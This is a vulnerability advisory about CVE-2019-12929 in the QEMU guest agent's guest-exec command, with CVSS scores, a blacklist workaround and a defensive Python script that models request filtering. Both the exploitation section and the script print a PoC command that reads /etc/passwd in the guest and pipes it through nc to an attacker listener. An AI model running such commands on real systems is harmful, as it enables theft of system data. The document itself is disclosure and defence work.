A critical vulnerability has recently been disclosed in QEMU (Quick Emulator), a hosted virtual machine monitor: a command execution flaw in its guest agent.

It was recently reported that the QEMU guest agent’s ‘guest-exec‘ command contains a critical OS command injection vulnerability that allows a remote, unauthenticated attacker to obtain sensitive information, execute commands, or cause a denial of service. The vulnerability has been assigned CVE-2019-12929. It can be exploited by sending a crafted QMP command (guest-exec) with malicious input to the targeted system, and exists because the affected software does not properly handle the QMP command.

This vulnerability is considered critical because the attacker can compromise the confidentiality and integrity of the system. The access complexity for successful exploitation is also very low, which works strongly in the attacker’s favour.


Exploitation:
The steps for exploiting this vulnerability were recently outlined by security researcher Fakhri Zulkifli. Exploitation requires only minimal knowledge of the QEMU host and guest services, but it would be difficult in a restricted environment (one with no network access to untrusted sources).

  • The QEMU guest agent service must be running.
  • Set up a port listener.
  • On the QEMU host, run the following command:

virsh qemu-agent-command <domain name of guest> '{"execute":"guest-exec","arguments":{"path":"/bin/bash","arg": ["-c", "cat /etc/passwd | nc <attacker ip> <listening port number>"]}}'

qemu-agent-command is the virsh command through which the guest-exec API is invoked in the guest OS. In the command above, guest-exec is passed as the request to qemu-agent-command, which runs ‘cat /etc/passwd‘ inside the guest. The ‘-c‘ argument hands the command string to /bin/bash, and the pipe to nc forwards the command’s output to the listening server port.

After the command runs successfully, the attacker obtains the contents of the /etc/passwd file without any direct access to the guest OS.

Although QEMU has not confirmed this vulnerability, we were able to exploit it successfully in an Ubuntu environment, confirming its existence in QEMU. According to the researcher, the vulnerability can be reproduced on Windows and macOS as well.

An attacker sends the guest-exec command to the guest OS (Ubuntu 16.04) to retrieve the contents of the file /etc/passwd. The contents of /etc/passwd on the guest OS are delivered to the attacker via port 1234, as shown in the animation below.


CVSS v3.0 Severity and Metrics:
Base Score: 9.8 CRITICAL
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v2.0 Severity and Metrics:
Base Score: 10.0 HIGH
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C


Affected software:
QEMU version 4.0.0 and earlier


Workaround:
A patch has not yet been released by the vendor for this vulnerability. In the meantime, users can apply the following workaround to safeguard their systems.

  • Users can disable the guest-exec command in the guest OS by starting qemu-ga with the --blacklist option, which adds the named API to the agent’s blacklist of disabled commands:

qemu-ga --blacklist=guest-exec
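The exploitation section above shows the wire format of the guest-exec request, and the workaround relies on qemu-ga’s blacklist refusing that command before it is dispatched. The following script is an added example written for this article, not QEMU’s own code: it models how a comma-separated value given to qemu-ga --blacklist filters incoming guest-agent JSON requests, and additionally flags any guest-exec request that launches a shell with -c, the pattern used in the PoC above. The sample requests, the IP address 192.0.2.10 and the list of shell paths are constructed for the example; the decision labels "deny", "review" and "allow" are this script’s own, not qemu-ga terminology.

```python
"""Model of qemu-ga's --blacklist filtering applied to guest-agent requests.

Added example (not QEMU's code). Reproduces in plain Python how the value of
`qemu-ga --blacklist=<comma-separated RPC names>` stops the guest-exec request
shown in the article, and flags guest-exec requests that spawn a shell.
"""
import json

# Constructed sample requests in the QMP/guest-agent wire format.
# The second one mirrors the PoC from the article; 192.0.2.10 is a documentation address.
SAMPLE_REQUESTS = [
    '{"execute":"guest-ping"}',
    '{"execute":"guest-exec","arguments":{"path":"/bin/bash",'
    '"arg":["-c","cat /etc/passwd | nc 192.0.2.10 1234"]}}',
    '{"execute":"guest-exec","arguments":{"path":"/usr/bin/uptime"}}',
    '{"execute":"guest-file-open","arguments":{"path":"/etc/passwd","mode":"r"}}',
]

# Constructed list of interpreter paths treated as "a shell" by the review heuristic.
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash"}


def parse_blacklist(value):
    """Split the value passed to `qemu-ga --blacklist=` (comma-separated) into a set."""
    return {name.strip() for name in value.split(",") if name.strip()}


def evaluate(request_json, blacklist):
    """Classify one JSON request against the blacklist.

    Returns (decision, reason): "deny" when the command is blacklisted or the
    request is malformed, "review" when a guest-exec request runs a shell with
    -c (the article's PoC shape), otherwise "allow".
    """
    try:
        req = json.loads(request_json)
    except json.JSONDecodeError as exc:
        return "deny", f"malformed JSON: {exc}"
    cmd = req.get("execute")
    if not isinstance(cmd, str):
        return "deny", "missing 'execute' field"
    if cmd in blacklist:
        return "deny", f"{cmd} is blacklisted"
    if cmd == "guest-exec":
        args = req.get("arguments") or {}
        path = args.get("path", "")
        argv = args.get("arg") or []
        if path in SHELLS and "-c" in argv:
            return "review", f"guest-exec spawns {path} with -c: {argv}"
    return "allow", cmd


def audit(requests, blacklist_value):
    """Evaluate every request under the given --blacklist value."""
    blacklist = parse_blacklist(blacklist_value)
    return [evaluate(r, blacklist) for r in requests]


if __name__ == "__main__":
    # Compare the default (empty) blacklist with the article's workaround.
    for setting in ("", "guest-exec"):
        print(f"--blacklist={setting!r}")
        for decision, reason in audit(SAMPLE_REQUESTS, setting):
            print(f"  {decision:6} {reason}")
```

Run with no blacklist, the PoC request is only flagged for review; with the article’s workaround value it is denied outright, while guest-ping and guest-file-open still pass. The review heuristic is deliberately narrow (shell path plus -c) so that legitimate guest-exec use of a specific binary, as in the uptime sample, is not blocked.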

Safeguards:

  • Administrators should keep QEMU up to date by installing all available updates.
  • Network access should be granted only to trusted users.
  • Administrators can use firewalls and antivirus applications to protect their systems from this attack.
Article: Caution QEMU Users!!! Your password file may be open to attackers
Publisher: SecPod Technologies
